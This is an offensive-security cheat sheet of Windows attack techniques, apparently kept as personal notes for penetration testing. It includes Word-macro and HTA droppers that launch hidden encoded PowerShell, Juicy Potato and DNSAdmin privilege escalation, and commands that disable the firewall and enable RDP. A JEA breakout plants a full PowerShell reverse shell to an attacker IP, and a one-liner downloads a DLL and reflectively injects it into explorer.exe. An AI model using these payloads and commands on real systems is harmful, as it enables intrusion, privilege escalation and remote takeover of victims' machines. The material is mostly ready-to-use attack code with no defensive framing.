xct's notes
Search…
Windows

CHM

Use a Windows VM, install the required tools from here, then get the scricpt Out-CHM.ps1 and create your payload:
1
Out-CHM -Payload C:\Windows\System32\spool\drivers\color\nc.exe -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Copied!

Juicy Potato

Metasploit (Details)

1
use windows/local/ms16_075_reflection_juicy`
2
set SESSION <>
3
set CLSID <>
Copied!
Common CLSIDs for the exploit are:
  • {e60687f7-01a1-40aa-86ac-db1cbf673334}
  • {752073A1-23F2-4396-85F0-8FDB879ED0ED}
  • {3c6859ce-230b-48a4-be6c-932c0c202048}
  • {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
  • {8F5DF053-3013-4dd8-B5F4-88214E81C0CF}
  • More can be found here

Word Macro

Simple Word Macro (View > Macros, at the end "File->Information->Check For Issues" to purge personal details), save as .doc:
1
Sub DoStuff()
2
Dim wsh As Object
3
Set wsh = CreateObject("WScript.Shell")
4
wsh.Run "<powershell command here>"
5
Set wsh = Nothing
6
End Sub
7
8
Sub AutoOpen()
9
DoStuff
10
End Sub
Copied!
Alternativly we can use HTA:
1
<script language="VBScript">
2
Function DoStuff()
3
Dim wsh
4
Set wsh = CreateObject("Wscript.Shell")
5
wsh.run "powershell -Sta -Nop -Window Hidden -EncodedCommand <blah>"
6
Set wsh = Nothing
7
End Function
8
9
DoStuff
10
self.close
11
</script>
Copied!

Building and Signing MSIs

Use wix to generate msi files from xml or to manipulate existing msi files. A complete example can be seen in the Ethereal Writeup

Windows Firewall

List rules

1
netsh advfirewall firewall show rule name=all
Copied!

Disable Firewall on Windows 7 via cmd

1
Reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Copied!

Disable Firewall on Windows 7 via Powershell

1
powershell.exe -ExecutionPolicy Bypass -command 'Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" –Value'`
Copied!

Disable Firewall on any windows via cmd

1
netsh Advfirewall set allprofiles state off
Copied!

Load DLL from System32

Windows 10

RunAs

To run commands with runas, the user has to have logged in at least once.

Tools

Elevate Privileges by loading a custom DLL as DNSAdmin

1
# requires RSAT
2
dnscmd <dc> /config /serverlevelplugindll \\<ip>\<dll>
3
4
# requires RSAT
5
$dnssettings = Get-DnsServerSetting -ComputerName <dc> -Verbose
6
$dnssettings.ServerLevelPluginDll = "\\<ip>\<dll>"
7
Set-DnsServerSetting -InputObject $dnssettings -ComputerName <dc> -Verbose
Copied!
Then restart the service:
1
sc.exe stop dns
2
sc.exe start dns
Copied!

DNS Enumeration/Exploitation Tools

GitHub - Kevin-Robertson/Powermad: PowerShell MachineAccountQuota and DNS exploit tools
GitHub

Bypass JEA

When in constrained language mode (or more):

Read File:
1
${C:\file.txt}
Copied!
Write File:
1
${C:\file.txt} = 'content'
Copied!
Break out by writing a powershell profile (executed whenever powershell is started by this user):
1
${C:\users\<user>\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1} = '$client = New-Object System.Net.Sockets.TCPClient("<ip>",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
Copied!
Via Script Blocks:
1
& { ls }
Copied!
Custom function:
1
PS>function xct { ls };
2
PS>xct
3
...
Copied!
These vulnerabilities exist only in Constrained Language Mode, usually with JEA "NoLanguage" is to be used.

RCE via Cab Files

Zero Day Initiative — CVE-2020-1300: Remote Code Execution Through Microsoft Windows CAB Files
Zero Day Initiative

Reflectivly load DLL into explorer.exe

1
String cmd = "$bytes = (New-Object System.Net.WebClient).DownloadData('http://<ip>/payload.dll');(New-Object System.Net.WebClient).DownloadString('http://<ip>/Invoke-ReflectivePEInjection.ps1') | IEX; $procid = (Get-Process -Name explorer).Id; Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid";
Copied!

Dump Sticky Note Contents

Resources

Last modified 4mo ago